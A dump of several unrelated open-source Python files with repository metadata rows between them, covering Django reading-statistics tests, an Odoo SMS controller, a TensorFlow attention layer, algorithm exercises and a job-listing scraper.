c1 = IndividualCreatorFactory()
pub1 = PublicationFactory()
PublicationRoleFactory(publication=pub1, creator=c1, role_name="")
ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=True)
ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=True)
ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=False)
# An unfinished reading
c2 = IndividualCreatorFactory()
pub2 = PublicationFactory()
PublicationRoleFactory(publication=pub2, creator=c2, role_name="")
ReadingFactory(publication=pub2, start_date=d, end_date=d, is_finished=False)
creators = most_read_creators()
self.assertEqual(len(creators), 1)
self.assertEqual(creators[0], c1)
self.assertEqual(creators[0].num_readings, 2)
class MostReadCreatorsCardTestCase(TestCase):
def test_returns_correct_data(self):
d = make_date("2017-02-15")
for i in range(2, 13):
c = IndividualCreatorFactory()
pub = PublicationFactory()
PublicationRoleFactory(publication=pub, creator=c, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
i, publication=pub, start_date=d, end_date=d, is_finished=True
)
data = most_read_creators_card()
self.assertIn("card_title", data)
self.assertIn("score_attr", data)
self.assertIn("object_list", data)
self.assertEqual(data["card_title"], "Most read authors")
self.assertEqual(data["score_attr"], "num_readings")
self.assertEqual(len(data["object_list"]), 10)
def test_num(self):
"It should return `num` items."
d = make_date("2017-02-15")
for i in range(2, 6):
c = IndividualCreatorFactory()
pub = PublicationFactory()
PublicationRoleFactory(publication=pub, creator=c, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
i, publication=pub, start_date=d, end_date=d, is_finished=True
)
data = most_read_creators_card(num=3)
self.assertIn("object_list", data)
self.assertEqual(len(data["object_list"]), 3)
def test_finished(self):
"It should only return finished readings"
d = make_date("2017-02-15")
# A finished reading
c1 = IndividualCreatorFactory()
pub1 = PublicationFactory()
PublicationRoleFactory(publication=pub1, creator=c1, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
3, publication=pub1, start_date=d, end_date=d, is_finished=True
)
# Another finished reading (so there's a chart)
c2 = IndividualCreatorFactory()
pub2 = PublicationFactory()
PublicationRoleFactory(publication=pub2, creator=c2, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
2, publication=pub2, start_date=d, end_date=d, is_finished=True
)
# An unfinished reading for the same author - they should still be in the
# chart though, because they have one finished reading.
ReadingFactory(publication=pub2, start_date=d, end_date=d, is_finished=False)
# An unfinished reading
c3 = IndividualCreatorFactory()
pub3 = PublicationFactory()
PublicationRoleFactory(publication=pub3, creator=c3, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
2, publication=pub3, start_date=d, end_date=d, is_finished=False
)
data = most_read_creators_card()
self.assertIn("object_list", data)
self.assertEqual(len(data["object_list"]), 2)
self.assertEqual(data["object_list"][0], c1)
self.assertEqual(data["object_list"][0].num_readings, 3)
self.assertEqual(data["object_list"][1], c2)
self.assertEqual(data["object_list"][1].num_readings, 2)
class MostVisitedVenuesTestCase(TestCase):
def test_returns_queryset(self):
"It should return 10 items by default."
for i in range(11):
MiscEventFactory(venue=VenueFactory())
venues = most_visited_venues()
self.assertEqual(len(venues), 10)
def test_num(self):
"It should return `num` items."
for i in range(4):
MiscEventFactory(venue=VenueFactory())
venues = most_visited_venues(num=3)
self.assertEqual(len(venues), 3)
class MostVisitedVenuesCardTestCase(TestCase):
def test_returns_correct_data(self):
for i in range(2, 13):
# It'll cut off any with only 1 reading, so:
MiscEventFactory.create_batch(i, venue=VenueFactory())
data = most_visited_venues_card()
self.assertIn("card_title", data)
self.assertIn("score_attr", data)
self.assertIn("object_list", data)
self.assertEqual(data["card_title"], "Most visited venues")
self.assertEqual(data["score_attr"], "num_visits")
self.assertEqual(len(data["object_list"]), 10)
def test_num(self):
"It should return `num` items."
for i in range(2, 6):
# It'll cut off any with only 1 reading, so:
MiscEventFactory.create_batch(i, venue=VenueFactory())
data = most_visited_venues_card(num=3)
self.assertIn("object_list", data)
self.assertEqual(len(data["object_list"]), 3)
| [
"[email protected]"
] | |
89dece8d86d548eb18d50cf9020cc5d85d9c4d93 | 4b4d21f6a2aaf8cb0ece595e4aaf9cb705ffdd49 | /marketing_message/controllers/controllers.py | c83db22f29b37ed9ac02bcf44de219ae2e23a33a | [] | no_license | sc4you/odoo-project-10.0 | e8c82b4cd42c0672e996561e75e0f9d0717821fa | bca7e400b6316bcbcefe6f0d088cb97a28f644bb | refs/heads/master | 2020-03-21T13:41:08.042847 | 2018-05-15T07:41:58 | 2018-05-15T07:41:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,270 | py | # -*- coding: utf-8 -*-
import babel.dates
import time, json
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
import werkzeug.urls
from werkzeug.exceptions import NotFound
import random
from odoo import http
from odoo import tools
from odoo.http import request
from odoo.tools.translate import _
from odoo.exceptions import UserError, ValidationError
import httplib
import urllib
# Terms of service
class SmsEvent(http.Controller):
def __init__(self):
param = request.env()['ir.config_parameter']
self.account = param.get_param('account') or ''
self.password = param.get_param('password') or ''
self.host_sign = param.get_param('host_sign') or ''
self.host_marketing = param.get_param('host_marketing') or ''
self.sms_heard = param.get_param('sms_heard') or ''
    # Send the request
def send_post(self, datas, host, sms_send_uri):
try:
datas = json.dumps(datas)
"""发送post请求"""
headers = {"Content-type": "application/json"}
conn = httplib.HTTPConnection(host, port=80, timeout=30)
conn.request("POST", sms_send_uri, datas, headers)
response = conn.getresponse()
response_str = response.read()
conn.close()
return response_str
except Exception:
return False
    # Send the SMS verification code
def commit_send_message(self, tel, code):
sms_send_uri = "/msg/variable/json"
phone = tel
code = code
params = phone + ',' + code
msg = self.sms_heard + u"您好!验证码是:{$var}"
        print self.account
datas = {
'account': self.account,
'password': self.password,
'msg': msg,
'params': params
}
send_result = self.send_post(datas, self.host_sign, sms_send_uri)
print send_result
if not send_result:
return False
else:
sort_data = json.loads(send_result)
print sort_data
if int(sort_data["code"]) == 0:
return code
else:
raise UserError(_(sort_data['errorMsg']))
| [
"[email protected]"
] | |
0961c7df4a2719e2dfeeece2c5a57cf3f59e263c | 2cb507ecd6629b9ff457a36e462f987913d94c1a | /python核心技术与实战/23/gil.py | f3ccf2898fadf6e776549b48a927183257a39720 | [
"Apache-2.0"
] | permissive | youaresherlock/PythonPractice | 6869e0a5949675198826e5a07552237a636d6f5b | 2e22d3fdcb26353cb0d8215c150e84d11bc9a022 | refs/heads/master | 2021-08-16T03:09:44.203035 | 2021-08-02T07:40:00 | 2021-08-02T07:40:00 | 146,625,560 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,159 | py | #!usr/bin/python
# -*- coding:utf8 -*-
import time
from threading import Thread
import sys
import threading
# Single-threaded version
def CountDown(n):
while n > 0:
n -= 1
if __name__ == "__main__":
n = 3000000
start_time = time.perf_counter()
CountDown(n)
end_time = time.perf_counter()
print("n = {},单线程版耗时{}".format(n, end_time-start_time))
# 多线程版
start_time = time.perf_counter()
t1 = Thread(target=CountDown, args = [n//2])
t2 = Thread(target=CountDown, args = [n//2])
t1.start()
t2.start()
t1.join()
t2.join()
end_time = time.perf_counter()
print("n = {},多线程版耗时{}".format(n, end_time-start_time))
# 对象引用计数
for k in range(100):
a = []
b = a
print(sys.getrefcount(a))
    # Thread safety: 100 threads bump a shared counter with no lock
n = 0
def foo():
global n
n += 1
threads = []
for i in range(100):
t = threading.Thread(target=foo)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
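
    # Hedged sketch: the same counter experiment guarded by a Lock. The bare
    # "n += 1" above is not atomic (load/add/store), so the unlocked version
    # can in principle lose updates; locking makes the result deterministic.
    m = 0
    m_lock = threading.Lock()

    def safe_foo():
        global m
        with m_lock:
            m += 1

    safe_threads = [threading.Thread(target=safe_foo) for _ in range(100)]
    for t in safe_threads:
        t.start()
    for t in safe_threads:
        t.join()
    print("with lock:", m)  # always 100

    # The unlocked counter from above prints last; it may fall short of 100.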
print(n) | [
"[email protected]"
] | |
58ce61b7f582ce7941345cabdd91cbb99c06692c | 78ee2d20722287f547c406a1cff1efc36d020ba3 | /flare_portal/versioning.py | b5ae7e3705b2d24587dd22d5d6233ad8eded23e8 | [
"MIT"
] | permissive | flare-kcl/flare-portal | db660b4ccc39a6f125d548fc9efb21026f097563 | a1cef9d22ba3f1bafac55bb6ee1c8223425101dd | refs/heads/main | 2023-07-24T10:00:27.807734 | 2022-07-19T02:08:38 | 2022-07-19T02:08:38 | 305,943,258 | 1 | 2 | MIT | 2023-07-03T14:40:33 | 2020-10-21T07:30:12 | Python | UTF-8 | Python | false | false | 2,608 | py | """Provides functions to fetch versions from Git
Copied from Raven Python
https://github.com/getsentry/raven-python/blob/d7d14f61b7fb425bcb15512f659626648c494f98/raven/utils/compat.py
"""
import os.path
class InvalidGitRepository(Exception):
pass
def fetch_git_sha(path: str, head: str = None) -> str:
"""
>>> fetch_git_sha(os.path.dirname(__file__))
"""
if not head:
head_path = os.path.join(path, ".git", "HEAD")
if not os.path.exists(head_path):
raise InvalidGitRepository(
"Cannot identify HEAD for git repository at %s" % (path,)
)
with open(head_path, "r") as fp:
head = str(fp.read()).strip()
if head.startswith("ref: "):
head = head[5:]
revision_file = os.path.join(path, ".git", *head.split("/"))
else:
return head
else:
revision_file = os.path.join(path, ".git", "refs", "heads", head)
if not os.path.exists(revision_file):
if not os.path.exists(os.path.join(path, ".git")):
raise InvalidGitRepository(
"%s does not seem to be the root of a git repository" % (path,)
)
# Check for our .git/packed-refs' file since a `git gc` may have run
# https://git-scm.com/book/en/v2/Git-Internals-Maintenance-and-Data-Recovery
packed_file = os.path.join(path, ".git", "packed-refs")
if os.path.exists(packed_file):
with open(packed_file) as fh:
for line in fh:
line = line.rstrip()
if line and line[:1] not in ("#", "^"):
try:
revision, ref = line.split(" ", 1)
except ValueError:
continue
if ref == head:
return str(revision)
raise InvalidGitRepository(
'Unable to find ref to head "%s" in repository' % (head,)
)
with open(revision_file) as fh:
return str(fh.read()).strip()
def fetch_package_version(dist_name: str) -> str:
"""
>>> fetch_package_version('sentry')
"""
try:
# Importing pkg_resources can be slow, so only import it
# if we need it.
import pkg_resources
except ImportError:
# pkg_resource is not available on Google App Engine
raise NotImplementedError(
"pkg_resources is not available " "on this Python install"
)
dist = pkg_resources.get_distribution(dist_name)
return dist.version
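
# Hedged usage sketch (paths and names are illustrative):
#   REPO_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#   sha = fetch_git_sha(REPO_ROOT)            # raises InvalidGitRepository if absent
#   version = fetch_package_version("django")  # any installed distribution name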
| [
"[email protected]"
] | |
ea5d5e55d54477a28c3d0d03081e37950effcb73 | ca17adac27ce0fc199a111db0e786bdbfd24f849 | /02-asyncio-basic/e02-http-server.py | fa21cd3155f88612807884c45b0db4c6eeb30ad7 | [] | no_license | genzj/asyncio-training-course | 862c1edb19bd3d25cb8a927fdb9942a9838c8d80 | 34e72a51f79945709fbd496391295e7cd92ec8e1 | refs/heads/master | 2023-08-08T05:25:01.438483 | 2023-07-17T08:53:59 | 2023-07-17T08:59:14 | 150,000,887 | 1 | 2 | null | 2023-07-25T23:36:11 | 2018-09-23T16:05:10 | Python | UTF-8 | Python | false | false | 353 | py | # -*- encoding: utf-8 -*-
from aiohttp import web
async def handle(request):
name = request.match_info.get('name', "Anonymous")
text = "Hello, " + name
return web.Response(text=text)
app = web.Application()
app.add_routes([web.get('/', handle),
web.get('/{name}', handle)])
web.run_app(app, host='127.0.0.1', port=5000)
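
# Hedged client-side check (run from another shell; names are illustrative):
#
#   import asyncio
#   import aiohttp
#
#   async def main():
#       async with aiohttp.ClientSession() as session:
#           async with session.get('http://127.0.0.1:5000/world') as resp:
#               print(await resp.text())  # -> "Hello, world"
#
#   asyncio.run(main())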
| [
"[email protected]"
] | |
58f4c40eb8c52f99c0002350e82dc95a31f3baa3 | 180dc578d12fff056fce1ef8bd1ba5c227f82afc | /official/legacy/transformer/attention_layer.py | fcdce774b03f1b27cdf8350104946a44372bf458 | [
"Apache-2.0"
] | permissive | jianzhnie/models | 6cb96c873d7d251db17afac7144c4dbb84d4f1d6 | d3507b550a3ade40cade60a79eb5b8978b56c7ae | refs/heads/master | 2023-07-12T05:08:23.314636 | 2023-06-27T07:54:20 | 2023-06-27T07:54:20 | 281,858,258 | 2 | 0 | Apache-2.0 | 2022-03-27T12:53:44 | 2020-07-23T05:22:33 | Python | UTF-8 | Python | false | false | 7,119 | py | # Copyright 2023 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of multiheaded attention and self-attention layers."""
import math
import tensorflow as tf
from official.modeling import tf_utils
class Attention(tf.keras.layers.Layer):
"""Multi-headed attention layer."""
def __init__(self, hidden_size, num_heads, attention_dropout):
"""Initialize Attention.
Args:
hidden_size: int, output dim of hidden layer.
num_heads: int, number of heads to repeat the same attention structure.
attention_dropout: float, dropout rate inside attention for training.
"""
if hidden_size % num_heads:
raise ValueError(
"Hidden size ({}) must be divisible by the number of heads ({})."
.format(hidden_size, num_heads))
super(Attention, self).__init__()
self.hidden_size = hidden_size
self.num_heads = num_heads
self.attention_dropout = attention_dropout
def build(self, input_shape):
"""Builds the layer."""
# Layers for linearly projecting the queries, keys, and values.
size_per_head = self.hidden_size // self.num_heads
def _glorot_initializer(fan_in, fan_out):
limit = math.sqrt(6.0 / (fan_in + fan_out))
return tf.keras.initializers.RandomUniform(minval=-limit, maxval=limit)
attention_initializer = _glorot_initializer(input_shape.as_list()[-1],
self.hidden_size)
self.query_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="query")
self.key_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="key")
self.value_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="value")
output_initializer = _glorot_initializer(self.hidden_size, self.hidden_size)
self.output_dense_layer = tf.keras.layers.EinsumDense(
"BTNH,NHE->BTE",
output_shape=(None, self.hidden_size),
kernel_initializer=output_initializer,
bias_axes=None,
name="output_transform")
super(Attention, self).build(input_shape)
def get_config(self):
return {
"hidden_size": self.hidden_size,
"num_heads": self.num_heads,
"attention_dropout": self.attention_dropout,
}
def call(self,
query_input,
source_input,
bias,
training,
cache=None,
decode_loop_step=None):
"""Apply attention mechanism to query_input and source_input.
Args:
query_input: A tensor with shape [batch_size, length_query, hidden_size].
source_input: A tensor with shape [batch_size, length_source,
hidden_size].
bias: A tensor with shape [batch_size, 1, length_query, length_source],
the attention bias that will be added to the result of the dot product.
training: A bool, whether in training mode or not.
cache: (Used during prediction) A dictionary with tensors containing
results of previous attentions. The dictionary must have the items:
{"k": tensor with shape [batch_size, i, heads, dim_per_head],
"v": tensor with shape [batch_size, i, heads, dim_per_head]} where
i is the current decoded length for non-padded decode, or max
sequence length for padded decode.
decode_loop_step: An integer, step number of the decoding loop. Used only
for autoregressive inference on TPU.
Returns:
Attention layer output with shape [batch_size, length_query, hidden_size]
"""
# Linearly project the query, key and value using different learned
# projections. Splitting heads is automatically done during the linear
# projections --> [batch_size, length, num_heads, dim_per_head].
query = self.query_dense_layer(query_input)
key = self.key_dense_layer(source_input)
value = self.value_dense_layer(source_input)
if cache is not None:
# Combine cached keys and values with new keys and values.
if decode_loop_step is not None:
cache_k_shape = cache["k"].shape.as_list()
indices = tf.reshape(
tf.one_hot(decode_loop_step, cache_k_shape[1], dtype=key.dtype),
[1, cache_k_shape[1], 1, 1])
key = cache["k"] + key * indices
cache_v_shape = cache["v"].shape.as_list()
indices = tf.reshape(
tf.one_hot(decode_loop_step, cache_v_shape[1], dtype=value.dtype),
[1, cache_v_shape[1], 1, 1])
value = cache["v"] + value * indices
else:
key = tf.concat([tf.cast(cache["k"], key.dtype), key], axis=1)
value = tf.concat([tf.cast(cache["v"], value.dtype), value], axis=1)
# Update cache
cache["k"] = key
cache["v"] = value
# Scale query to prevent the dot product between query and key from growing
# too large.
depth = (self.hidden_size // self.num_heads)
query *= depth**-0.5
# Calculate dot product attention
logits = tf.einsum("BTNH,BFNH->BNFT", key, query)
logits += bias
# Note that softmax internally performs math operations using float32
# for numeric stability. When training with float16, we keep the input
# and output in float16 for better performance.
weights = tf.nn.softmax(logits, name="attention_weights")
if training:
weights = tf.nn.dropout(weights, rate=self.attention_dropout)
attention_output = tf.einsum("BNFT,BTNH->BFNH", weights, value)
# Run the outputs through another linear projection layer. Recombining heads
# is automatically done --> [batch_size, length, hidden_size]
attention_output = self.output_dense_layer(attention_output)
return attention_output
class SelfAttention(Attention):
"""Multiheaded self-attention layer."""
def call(self,
query_input,
bias,
training,
cache=None,
decode_loop_step=None):
return super(SelfAttention, self).call(query_input, query_input, bias,
training, cache, decode_loop_step)
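
# Hedged shape-check sketch (illustrative values; assumes TF 2.x eager mode):
#   layer = SelfAttention(hidden_size=64, num_heads=8, attention_dropout=0.1)
#   x = tf.random.uniform([2, 5, 64])     # [batch, length, hidden]
#   bias = tf.zeros([2, 1, 5, 5])         # additive bias; zeros = no masking
#   out = layer(x, bias, training=False)  # -> shape [2, 5, 64]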
| [
"[email protected]"
] | |
79700ce48d4aacbecddc068d807ecf3f56d9dc9c | c7a1470d2f6a15265e1f884c86439dc6d98b4484 | /LintCode/trie/0442_Implement_Trie_(Prefix_Tree).py | 7a674f32a78d465c8b92d461ef3d7d86a6c3d96c | [] | no_license | GuanYangCLU/AlgoTestForPython | 5239774fb6c840f3d65c4e4290ce8125fe8c94d3 | dddbc8115f69dec636c62c755f02905c469155e0 | refs/heads/master | 2022-01-19T15:03:54.835403 | 2021-12-30T02:19:37 | 2021-12-30T02:19:37 | 122,312,195 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,196 | py | class TrieNode:
def __init__(self):
self.children = {}
self.isWord = False
class Trie:
def __init__(self):
        # do initialization if necessary
self.root = TrieNode()
"""
@param: word: a word
@return: nothing
"""
def insert(self, word):
# write your code here
node = self.root
for c in word:
if c not in node.children:
node.children[c] = TrieNode()
node = node.children[c]
node.isWord = True
def find(self, word):
node = self.root
for c in word:
if c not in node.children:
return None
node = node.children[c]
return node
"""
@param: word: A string
@return: if the word is in the trie.
"""
def search(self, word):
# write your code here
res = self.find(word)
return False if not res else res.isWord
"""
@param: prefix: A string
@return: if there is any word in the trie that starts with the given prefix.
"""
def startsWith(self, prefix):
# write your code here
return self.find(prefix) is not None
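
# Small usage sketch (not part of the original LintCode submission):
if __name__ == '__main__':
    trie = Trie()
    trie.insert("apple")
    assert trie.search("apple") is True
    assert trie.search("app") is False
    assert trie.startsWith("app") is True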
| [
"[email protected]"
] | |
462ac9a85d6bc6fb7b67357293dc32fc8f1a8490 | 0f9c9e4c60f28aa00aff8b80e1e4c142c61d24ce | /Python/LeetCode/102_binary_tree_level_order_traversal.py | 9bf5ae9c253e87223e6611d5901e3a0a777bd81d | [] | no_license | shouliang/Development | c56fcc69e658393c138b63b507b96c48232128d5 | b7e3b02c50d54515e584cb18dff83109224245d0 | refs/heads/master | 2020-03-22T09:14:51.070228 | 2019-08-29T02:50:26 | 2019-08-29T02:50:26 | 139,825,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,498 | py | '''
二叉树按层次遍历
102. Binary Tree Level Order Traversal:https://leetcode.com/problems/binary-tree-level-order-traversal/
思路: 使用队列这种数据结构:首先根节点进入队列,然后在队列头部弹出节点的同时,将其左右分支依次插入队列的尾部,
直至队列为空
其实这就是图的bfs,但是二叉树就是一种特殊的图
'''
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
result = []
queue = [] # 队列
queue.append(root) # 根节点进入队列
while queue:
cur_level = []
level_size = len(queue)
for _ in range(level_size): # 遍历当前层,处理完当前层,再将当前层的一维数组加入到二维结果中
node = queue.pop(0) # 在队列头部弹出节点的同时,将其左右分支依次append()到队列的尾部
cur_level.append(node.val)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
result.append(cur_level)
return result
class Solution2(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
result = []
queue = [] # 队列
queue.append(root) # 根节点进入队列
while queue:
node = queue.pop(0) # 在队列头部弹出节点的同时,将其左右分支依次append()到队列的尾部
result.append(node.val) # 处理结点,访问其相邻的节点并进入队列
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
return result
s = Solution()
root = TreeNode(3)
treeNode1 = TreeNode(9)
treeNode2 = TreeNode(20)
root.left = treeNode1
root.right = treeNode2
treeNode3 = TreeNode(15)
treeNode4 = TreeNode(7)
treeNode2.left = treeNode3
treeNode2.right = treeNode4
ret = s.levelOrder(root)
print(ret)
s2 = Solution2()
ret = s2.levelOrder(root)
print(ret)
| [
"[email protected]:node/hunqing.git"
] | [email protected]:node/hunqing.git |
3703f80c8a35f44e25ab5acfc87a2c94b2001201 | 876de904572c611b8cbad21f50877cdc812f2946 | /Leetcode/529. 扫雷游戏.py | 3e649e9aaf806904b938e610485bcf270d5df164 | [
"MIT"
] | permissive | QDylan/Learning- | 66a33de0e15f26672fb63c0b393866721def27ae | f09e0aa3de081883b4a7ebfe4d31b5f86f24b64f | refs/heads/master | 2023-02-08T02:34:26.616116 | 2020-12-25T05:02:32 | 2020-12-25T05:02:32 | 263,805,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,152 | py | # -*- coding: utf-8 -*-
"""
@Time : 2020/8/20 10:17
@Author : QDY
@FileName: 529. 扫雷游戏.py
@Software: PyCharm
"""
"""
Let's play Minesweeper!
You are given a 2D character matrix representing the game board. 'M' is an
unrevealed mine, 'E' is an unrevealed empty square,
'B' is a revealed blank square with no adjacent mines (above, below, left,
right, and all 4 diagonals),
a digit ('1' to '8') tells how many mines are adjacent to that revealed
square, and 'X' is a revealed mine.
Now, given the next click position (row and column indices) among the
unrevealed squares ('M' or 'E'), return the board after that click is
applied, following these rules:
If a mine ('M') is revealed, the game is over - change it to 'X'.
If an empty square ('E') with no adjacent mines is revealed, change it to
'B', and all of its adjacent unrevealed squares should be revealed
recursively.
If an empty square ('E') with at least one adjacent mine is revealed,
change it to a digit ('1' to '8') representing the number of adjacent mines.
Return the board once no more squares will be revealed for this click.
Example 1:
Input:
[['E', 'E', 'E', 'E', 'E'],
['E', 'E', 'M', 'E', 'E'],
['E', 'E', 'E', 'E', 'E'],
['E', 'E', 'E', 'E', 'E']]
Click : [3,0]
Output:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'M', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
Explanation:
Example 2:
Input:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'M', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
Click : [1,2]
Output:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'X', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
Explanation:
Note:
The width and height of the input matrix are in the range [1,50].
The click position is always an unrevealed square ('M' or 'E'), which also
means the board contains at least one clickable square.
The input board is never in a game-over state (no mine has been revealed yet).
For simplicity, rules not mentioned are ignored in this problem; e.g. when
the game is over you don't need to reveal all the mines, and you may ignore
the cases where you would win or flag squares.
"""
from collections import deque
class Solution:
def updateBoard(self, board, click):
if board[click[0]][click[1]] == 'M':
board[click[0]][click[1]] = 'X'
return board
h, w = len(board), len(board[0])
def mine_count(x, y):
res = 0
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
if 0 <= x + dx < h and 0 <= y + dy < w and board[x + dx][y + dy] in ('M', 'X'):
res += 1
return res
def dfs(x, y):
board[x][y] = mine_count(x, y)
if board[x][y] == 0:
board[x][y] = 'B'
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
nxt_x, nxt_y = x + dx, y + dy
if 0 <= nxt_x < h and 0 <= nxt_y < w and board[nxt_x][nxt_y] == 'E':
dfs(nxt_x, nxt_y)
else:
board[x][y] = str(board[x][y])
# dfs(click[0],click[1])
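        # Design note: the recursive dfs above is kept for reference; the BFS
        # below avoids Python's recursion limit, which matters on boards up to
        # the stated 50x50 with large blank regions.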
q = deque([(click[0], click[1])])
while q:
length = len(q)
for i in range(length):
x, y = q.popleft()
board[x][y] = mine_count(x, y)
if board[x][y] == 0:
board[x][y] = 'B'
for dx in (-1, 1, 0):
for dy in (-1, 1, 0):
nxt_x, nxt_y = x + dx, y + dy
if 0 <= nxt_x < h and 0 <= nxt_y < w and board[nxt_x][nxt_y] == 'E':
q.append((nxt_x, nxt_y))
board[nxt_x][nxt_y] = 'B'
else:
board[x][y] = str(board[x][y])
return board
| [
"[email protected]"
] | |
a3a216ba5eb2add7fd1e92e28f32ec90873d2f02 | f7d4993c3f9d840b3505e82567e673de00d91afc | /Code/rearrange.py | 95a3ffe7b898c2f242d8bb2a8905229d5b2251a6 | [] | no_license | Andre-Williams22/CS-1.2-Intro-Data-Structures | 026bb08c219ffcb7bafe43d3ea8426f821d6bc5c | a9effc2257a539456688c408ec4ae9e4d4d67e11 | refs/heads/master | 2022-12-10T00:12:31.879273 | 2019-12-12T07:10:33 | 2019-12-12T07:10:33 | 216,670,821 | 0 | 0 | null | 2022-09-23T22:30:43 | 2019-10-21T21:44:10 | Python | UTF-8 | Python | false | false | 1,080 | py | import random
import sys
# a = input('please type a word: ')
# b = input('please type a word: ')
# c = input('please type a word: ')
# d = input('please type a word: ')
# e = input('please type a word: ')
# words = []
# words.append(a)
# words.append(b)
# words.append(c)
# words.append(d)
# words.append(e)
# print ("The list before shuffling is : ", end="")
# for i in range(0, len(words)):
# print(words[i], end=" ")
# print("\r")
# random.shuffle(words)
# print(random.choice(words))
# # Printing list after shuffling
# print ("The list after shuffling is : ", end="")
# for i in range(0, len(words)):
# print (words[i], end=" ")
# print("\r")
def rearrange(words):
result = []
for i in range(len(words)):
word = random.choice(words)
result.append(word)
words.remove(word)
    # return the full shuffle; the old `result[:-1]` dropped the last word
    return result
def reverse(words):
new_list = words[::-1]
    return new_list
if __name__ == '__main__':
words = list(sys.argv[1:])
temp = rearrange(words)
print(temp)
print(reverse(temp)) | [
"[email protected]"
] | |
85d6d96659e6ab8df9179e891d05df56649e2e6d | a8062308fb3bf6c8952257504a50c3e97d801294 | /problems/N431_Encode_Nary_Tree_To_Binary_Tree.py | 29be7e11dec99008b385e8fc593469702e866409 | [] | no_license | wan-catherine/Leetcode | 650d697a873ad23c0b64d08ad525bf9fcdb62b1b | 238995bd23c8a6c40c6035890e94baa2473d4bbc | refs/heads/master | 2023-09-01T00:56:27.677230 | 2023-08-31T00:49:31 | 2023-08-31T00:49:31 | 143,770,000 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,213 | py | """
For any node in the N-ary tree:
its first child becomes the Binary Tree node's left child;
all remaining children chain off that first child's right pointers.
"""
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Codec:
def encode(self, root):
"""Encodes an n-ary tree to a binary tree.
:type root: Node
:rtype: TreeNode
"""
if not root:
return
t = TreeNode(root.val)
if root.children:
t.left = self.encode(root.children[0])
cur = t.left
for node in root.children[1:]:
cur.right = self.encode(node)
cur = cur.right
return t
def decode(self, data):
"""Decodes your binary tree to an n-ary tree.
:type data: TreeNode
:rtype: Node
"""
if not data:
return
root = Node(data.val, [])
cur = data.left
while cur:
root.children.append(self.decode(cur))
cur = cur.right
return root | [
"[email protected]"
] | |
88d3dd854018f601e7960c53e13223c135447a52 | 9db281fbed35bb8384eeacaa81d1a32a9dcc5cca | /class-17/demo/monster-jobs/monster_jobs/scraper.py | 0bb9e23c6da0da5a1287792a996e2dcec15b38c1 | [] | no_license | corey-marchand/seattle-python-401d14 | aab3f48c82229f1958989ce8318de60b9abbe4e2 | ae9ffebc9e5250cb5ec1760fd7764da0d3ad4e4c | refs/heads/master | 2022-11-15T16:09:37.248530 | 2020-07-09T19:10:49 | 2020-07-09T19:10:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,355 | py | import requests
from bs4 import BeautifulSoup
# Send a request to Monster webpage
URL = 'https://www.monster.com/jobs/search/?q=software-engineer&where=Seattle__2C-WA'
response = requests.get(URL)
# print(dir(response))
# Extract content
content = response.content
# Convert to BS object
soup = BeautifulSoup(content, 'html.parser')
# Find an element
results = soup.find(id='SearchResults')
# print(results.prettify())
jobs_list = results.find_all('section', class_='card-content')
# print(len(jobs_list))
final_results = []
for job in jobs_list:
job_dict = {'title': '', 'location':'', 'company':''}
found_title = job.find('h2', class_='title')
if found_title:
title = found_title.text.strip()
job_dict['title'] = title
found_location = job.find('div', class_='location')
if found_location:
location = found_location.text.strip()
job_dict['location'] = location
found_company = job.find('div', class_='company')
if found_company:
company = found_company.text.strip()
job_dict['company'] = company
final_results.append(job_dict)
# print(title)
# print('********************************')
